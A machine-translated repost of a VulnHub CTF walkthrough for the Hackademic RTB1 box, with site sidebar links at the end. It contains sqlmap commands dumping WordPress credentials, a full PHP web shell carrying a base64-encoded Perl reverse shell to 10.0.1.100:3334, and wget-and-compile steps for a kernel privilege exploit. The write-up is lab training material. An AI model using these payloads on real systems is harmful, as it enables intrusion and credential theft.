当前位置:网站首页>vulnhub-Root_ this_ box
vulnhub-Root_ this_ box
2022-07-05 15:37:00 【GALi_ two hundred and thirty-three】
Description
This is the first realistic hackademic challenge (root this box) by mr.pr0n
Download the target and get root.
After all, try to read the contents of the file ‘key.txt’ in the root directory.
Enjoy!
Scanning and service identification
Two layer scanning confirms the target IP
sudo arp-scan -l
Confirm the target by judgment IP The address is 10.0.1.101
Scan open port
sudo nmap -p- 10.0.1.101
Confirm that it is open 80 port , It could be a web service , Scan its services
Discovery is a Fedora The server , No information is available for the time being
Go directly to the website
It is found in the web source code that this is a Wordpress 1.5.1.1 Of CMS, The version is very old , Public vulnerabilities can be exploited .
I found some links with parameters in the website , And through the single quotation mark test, it is found that SQL Inject holes , And the database is MySQL.
http://10.0.1.101/Hackademic_RTB1/?cat=1'
SQL Inject
use sqlmap Run the tool once
Burst the database name
sudo sqlmap -u "http://10.0.1.101/Hackademic_RTB1/?cat=1" --dbs -batch
Burst the name of the data table
sudo sqlmap -u "http://10.0.1.101/Hackademic_RTB1/?cat=1" -D wordpress --tables -batch
Break the list
sudo sqlmap -u "http://10.0.1.101/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns -batch
dump data
sudo sqlmap -u "http://10.0.1.101/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump -batch
Successfully cracked 6 Accounts , There is an administrator account , But it also needs to manage the background address and explode the website directory
sudo dirsearch -u http://10.0.1.101/Hackademic_RTB1/
Find the administrator background address
Try to login with the account obtained above , It turns out that only GeorgeMiller Have administrator rights
By modifying the option, Allow file upload .
Upload files
Prepare one php Of shell Trojan horse
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while([email protected]($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if([email protected]($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "10.0.1.100";
$yourport = '3334';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
Upload files
Upload successful , And return the file path
adopt nc monitor 3334 port
nc -nvlp 3334
visit http://10.0.1.101/Hackademic_RTB1/wp-content/hack.php
Gets the returned shell, But the permission is relatively low, not root jurisdiction , But found linux The kernel version of , You can try to find the loophole of raising rights
The core raises the right
Find the vulnerability of the corresponding kernel version
searchsploit 2.6.3 | grep "Local Privilege"
take shellcode Copied to the /var/www/html route
sudo cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html
Local kali Turn on apache2 service
service apache2 start
adopt wget take shellcode Download to the target ( Enter into /tmp Catalog )
wget http://10.0.1.100/15285.c
Compile operation shellcode
gcc 15285.c -o exploit
chmod +x exploit
./exploit
Successful acquisition root jurisdiction
stay root In the directory key.txt file , Get password
边栏推荐
- keep-alive
- Coding devsecops helps financial enterprises run out of digital acceleration
- Lesson 4 knowledge summary
- PHP high concurrency and large traffic solution (PHP interview theory question)
- 【簡記】解决IDE golang 代碼飄紅報錯
- Common redis data types and application scenarios
- 百亿按摩仪蓝海,难出巨头
- RepLKNet:不是大卷积不好,而是卷积不够大,31x31卷积了解一下 | CVPR 2022
- Analytic hierarchy process of mathematical modeling (including Matlab code)
- qt creater断点调试程序详解
猜你喜欢
Fundamentals of data communication - Principles of IP routing
Transfer the idea of "Zhongtai" to the code
DVWA range clearance tutorial
Ctfshow web entry command execution
【简记】解决IDE golang 代码飘红报错
把 ”中台“ 的思想迁移到代码中去
Bugku's eyes are not real
Bugku easy_ nbt
Appium automation test foundation - appium basic operation API (II)
Ten billion massage machine blue ocean, difficult to be a giant
随机推荐
Talk about your understanding of microservices (PHP interview theory question)
First PR notes
The difference between abstract classes and interfaces in PHP (PHP interview theory question)
CODING DevSecOps 助力金融企业跑出数字加速度
Cartoon: programmers don't repair computers!
Optional parameters in the for loop
SQL Server learning notes
Ctfshow web entry explosion
Definition of episodic and batch
做研究无人咨询、与学生不交心,UNC助理教授两年教职挣扎史
Object. defineProperty() - VS - new Proxy()
Severlet learning foundation
Bugku alert
当代人的水焦虑:好水究竟在哪里?
Reproduce ThinkPHP 2 X Arbitrary Code Execution Vulnerability
Misc Basic test method and knowledge points of CTF
修改pyunit_time使得其支持‘xx~xx月’的时间文本
Ecotone technology has passed ISO27001 and iso21434 safety management system certification
Appium automation test foundation - appium basic operation API (II)
How can the boss choose programmers to help me with development?